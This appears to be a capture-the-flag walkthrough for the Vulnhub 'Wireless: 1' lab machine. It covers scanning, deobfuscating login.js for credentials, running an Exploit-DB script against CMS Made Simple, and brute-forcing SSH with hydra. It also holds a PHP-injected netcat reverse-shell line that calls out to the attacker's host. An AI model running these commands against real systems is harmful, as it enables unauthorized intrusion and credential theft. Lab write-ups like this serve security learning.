Vulnhub Wireless: 1 Walkthrough

https://www.vulnhub.com/entry/wireless-1,669/


Scan all ports with Nmap.

nmap -sV -p- -oN ports.log 192.168.33.136

A directory scan on port 80 turns up only index.html.

Port 8000 looks like a CMS site. Note the upper-left corner: it shows a username, "jinmori@voip.in".

Click Login to reach the login panel.

Check the page source and notice login.js.

Check the source code of login.js.

Base64-decode it to get the original JS code:

var _0xb5c3=["\x6A\x69\x6E\x6D\x6F\x72\x69","\x54\x68\x65\x20\x71\x75\x69\x63\x6B\x20\x62\x72\x6F\x77\x6E\x20\x66\x6F\x78\x20\x6A\x75\x6D\x70\x73\x20\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x6C\x61\x7A\x79\x20\x64\x6F\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];
var u=_0xb5c3[0];
var string=_0xb5c3[1];
var a=string[_0xb5c3[2]](0);
var b=string[_0xb5c3[2]](36);
var c=string[_0xb5c3[2]](2);
var d=string[_0xb5c3[2]](8);
var e=string[_0xb5c3[2]](13);
var f=string[_0xb5c3[2]](12);
var g=string[_0xb5c3[2]](14);
var h=string[_0xb5c3[2]](40);
var i=string[_0xb5c3[2]](12);
var p=String[_0xb5c3[3]](a,b,c,d,e,f,g,h,i);


Running this piece of code online at https://playcode.io/new/ yields a string that looks like a password.
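Instead of pasting the snippet into an online runner, the same result can be recovered statically. The block below is an added example, not code from the original post: it embeds a copy of the decoded login.js snippet shown above, decodes the \xNN string table, follows the charCodeAt(N) picks, and rebuilds the password without ever executing the obfuscated script. The helper names (decodeEscapes, extractStringTable, recoverCredentials) are mine, and the code assumes the picks are passed to fromCharCode in source order, as they are in login.js.

```javascript
// Added example (not part of the original walkthrough): statically recover
// the credentials from the login.js pattern above without executing it.
// LOGIN_JS is a copy of the decoded snippet shown in the post; String.raw
// keeps the \xNN escapes literal so the code decodes them itself.
const LOGIN_JS = String.raw`
var _0xb5c3=["\x6A\x69\x6E\x6D\x6F\x72\x69","\x54\x68\x65\x20\x71\x75\x69\x63\x6B\x20\x62\x72\x6F\x77\x6E\x20\x66\x6F\x78\x20\x6A\x75\x6D\x70\x73\x20\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x6C\x61\x7A\x79\x20\x64\x6F\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];
var u=_0xb5c3[0];
var string=_0xb5c3[1];
var a=string[_0xb5c3[2]](0);
var b=string[_0xb5c3[2]](36);
var c=string[_0xb5c3[2]](2);
var d=string[_0xb5c3[2]](8);
var e=string[_0xb5c3[2]](13);
var f=string[_0xb5c3[2]](12);
var g=string[_0xb5c3[2]](14);
var h=string[_0xb5c3[2]](40);
var i=string[_0xb5c3[2]](12);
var p=String[_0xb5c3[3]](a,b,c,d,e,f,g,h,i);
`;

// 1. Turn a JS string-literal body with \xNN / \uNNNN escapes into plain text.
function decodeEscapes(body) {
  return body.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// 2. Locate the string table `var NAME=["...", ...];` and decode every entry.
function extractStringTable(src) {
  const m = src.match(/var\s+(\w+)\s*=\s*\[([^\]]*)\]/);
  if (!m) throw new Error('no string table found');
  const entries = [...m[2].matchAll(/"((?:[^"\\]|\\.)*)"/g)]
    .map(e => decodeEscapes(e[1]));
  return { name: m[1], entries };
}

// 3. Follow the table references: which entry is the source text, which is the
//    username, and which offsets are picked via charCodeAt(N). Assumes (as in
//    login.js) that the picks reach fromCharCode in source order.
function recoverCredentials(src) {
  const { name, entries } = extractStringTable(src);
  const ref = (varName) => {
    const r = src.match(new RegExp(`var\\s+${varName}\\s*=\\s*${name}\\[(\\d+)\\]`));
    if (!r) throw new Error(`no assignment for ${varName}`);
    return entries[Number(r[1])];
  };
  const username = ref('u');
  const text = ref('string');
  const picks = [...src.matchAll(new RegExp(`string\\[${name}\\[(\\d+)\\]\\]\\((\\d+)\\)`, 'g'))]
    .map(p => ({ method: entries[Number(p[1])], offset: Number(p[2]) }));
  for (const p of picks) {
    if (p.method !== 'charCodeAt') throw new Error(`unexpected method ${p.method}`);
    if (p.offset >= text.length) throw new Error(`offset ${p.offset} out of range`);
  }
  // charCodeAt followed by fromCharCode is an identity, so the password is just
  // the characters of the source text at the picked offsets.
  const password = picks.map(p => text[p.offset]).join('');
  return { username, text, offsets: picks.map(p => p.offset), password };
}

console.log(recoverCredentials(LOGIN_JS));
```

The point of doing it this way is that the obfuscated code never runs: the string table is decoded from the escapes, and the charCodeAt/fromCharCode round trip is recognised as a simple character pick, which is the usual shape of this kind of client-side credential hiding.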

Log in with "jinmori" and the password we just got to reach the admin panel.

Choose Admin --> VOIP logs.

The logs contain some SMS PDU-encoded strings.

Decode the strings online at https://www.diafaan.com/sms-tutorials/gsm-modem-tutorial/online-sms-pdu-decoder/ to get some hints:

ur new domain for WiFi testing is wireless.com 
Wireless Testing portal is open for authenticated users to test our internal network wireless.com
Testing Portal has been shifted to port: 8080
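The strings in the VOIP logs are raw SMS PDUs, the same format the online decoder above reads. As an added example that is not part of the original post, here is a minimal SMS-DELIVER PDU decoder in JavaScript. The PDU it parses is constructed for this example (no SMSC, sender +1234567890, timestamp 2022-05-01 12:30:00 GMT, and the standard "hellohello" 7-bit sample payload); it is not the string from the machine. The decoder handles only the 7-bit default alphabet with no user data header, which is what a plain text SMS uses.

```javascript
// Added example (not from the original post): decode an SMS-DELIVER PDU.
// SAMPLE_PDU is CONSTRUCTED for this example, field by field:
//   00             SMSC length 0 (no SMSC address)
//   04             first octet: TP-MTI=00 (SMS-DELIVER), TP-MMS set
//   0A 91          sender: 10 digits, type-of-address 0x91 (international)
//   2143658709     sender digits, nibble-swapped BCD -> 1234567890
//   00 00          TP-PID, TP-DCS (0x00 = GSM 7-bit default alphabet)
//   22501021030000 timestamp, nibble-swapped -> 22-05-01 12:30:00 tz 00
//   0A             user data length: 10 septets
//   E8329BFD...    "hellohello" packed 7-bit
const SAMPLE_PDU = '00' + '04' + '0A91' + '2143658709' + '00' + '00' +
  '22501021030000' + '0A' + 'E8329BFD4697D9EC37';

// GSM 03.38 default 7-bit alphabet; index = septet value (128 entries).
const GSM7 = '@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ !"#¤%&\'()*+,-./0123456789:;<=>?' +
  '¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà';

function hexToBytes(hex) {
  const out = [];
  for (let i = 0; i < hex.length; i += 2) out.push(parseInt(hex.slice(i, i + 2), 16));
  return out;
}

// Semi-octet (BCD) fields store digits nibble-swapped: "2143" -> "1234".
function swapNibbles(hex) {
  let s = '';
  for (let i = 0; i < hex.length; i += 2) s += hex[i + 1] + hex[i];
  return s;
}

// Unpack septets that were packed LSB-first into octets (GSM 7-bit packing).
function unpack7bit(bytes, septetCount) {
  const septets = [];
  let buf = 0, bits = 0;
  for (const b of bytes) {
    buf |= b << bits;
    bits += 8;
    while (bits >= 7 && septets.length < septetCount) {
      septets.push(buf & 0x7f);
      buf >>>= 7;
      bits -= 7;
    }
  }
  return septets;
}

function decodeSmsDeliver(pduHex) {
  const hex = pduHex.toUpperCase();
  let pos = 0;
  const take = (nOctets) => { const s = hex.slice(pos, pos + nOctets * 2); pos += nOctets * 2; return s; };

  const smscLen = parseInt(take(1), 16);      // SMSC info length in octets
  take(smscLen);                               // skip the SMSC address if present
  const firstOctet = parseInt(take(1), 16);
  if ((firstOctet & 0x03) !== 0) throw new Error('not an SMS-DELIVER PDU');

  const oaDigits = parseInt(take(1), 16);      // originating address length, in digits
  const oaType = parseInt(take(1), 16);        // 0x91 = international numbering
  const oaRaw = take(Math.ceil(oaDigits / 2));
  const sender = (oaType === 0x91 ? '+' : '') + swapNibbles(oaRaw).replace(/F/g, '');

  const pid = parseInt(take(1), 16);
  const dcs = parseInt(take(1), 16);
  if ((dcs & 0x0c) !== 0) throw new Error('only the 7-bit default alphabet is handled here');

  // Service centre timestamp: YY MM DD hh mm ss tz, all nibble-swapped BCD;
  // tz is in quarter hours with the sign in bit 3 of its first semi-octet.
  const ts = swapNibbles(take(7));
  const tzTens = parseInt(ts[12], 16);
  const quarters = (tzTens & 7) * 10 + parseInt(ts[13], 10);
  const tz = `${tzTens & 8 ? '-' : '+'}${String(Math.floor(quarters / 4)).padStart(2, '0')}:` +
    `${String((quarters % 4) * 15).padStart(2, '0')}`;
  const timestamp = `20${ts.slice(0, 2)}-${ts.slice(2, 4)}-${ts.slice(4, 6)} ` +
    `${ts.slice(6, 8)}:${ts.slice(8, 10)}:${ts.slice(10, 12)} GMT${tz}`;

  const udl = parseInt(take(1), 16);           // user data length, in septets for 7-bit
  const udOctets = hexToBytes(take(Math.ceil(udl * 7 / 8)));
  const text = unpack7bit(udOctets, udl).map(v => (v < GSM7.length ? GSM7[v] : '?')).join('');
  return { sender, pid, dcs, timestamp, text };
}

console.log(decodeSmsDeliver(SAMPLE_PDU));
```

Two details trip people up when reading these by hand: the originating address length is counted in digits, not octets, and the user data length is counted in septets, so the last octet of a 7-bit payload may hold only padding bits.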


Add wireless.com to /etc/hosts and run a vhost scan against port 8080. It finds testing.wireless.com; add that to /etc/hosts too.

gobuster vhost -u http://wireless.com:8080  -w  /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Run Gobuster against port 80 again, this time through the wireless.com hostname; now it finds a CMS site (with the bare IP it was empty).

gobuster dir -u http://wireless.com -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard

Now we have two places to check: wireless.com:80 and testing.wireless.com:8080.

Let's start with port 80. It's a CMS Made Simple site.

Notice the version is 2.2.9.

Search Exploit-DB for that version.

Use the PoC code to get the username and password.

python 46635.py -u http://wireless.com --crack -w /usr/share/wordlists/rockyou.txt

Log in with the credentials, go to Extensions --> User Defined Tags, edit a user-defined tag, enter the following code and click "Apply" --> "Run".

echo system("nc 192.168.33.128 2333|/bin/sh|nc 192.168.33.128 2444");

After clicking Run we get a reverse shell: port 2333 carries the input and port 2444 carries the output.

Then we can upload a traditional PHP reverse shell and get an interactive shell in a single terminal.

The machine has only one user, "coherer", and after a lot of enumeration www-data cannot escalate to "coherer".

Now let's go back to port 8080. Visiting it brings us to a bot app. Typing "help" lists some commands.

Input "logs", then we get a log file http://testing.wireless.com:8080/static/Network.data.

Checking the content, it contains several short stories.

We can build a wordlist from it.

cewl -d 1 http://testing.wireless.com:8080/static/Network.data > dic.txt

Brute-force coherer's SSH password with this wordlist.

hydra -l coherer -P dic.txt -t 64 192.168.33.136 ssh -f

Log in over SSH and check the user's groups.

The last step is a classic lxd root privilege escalation; I'll skip the details here.
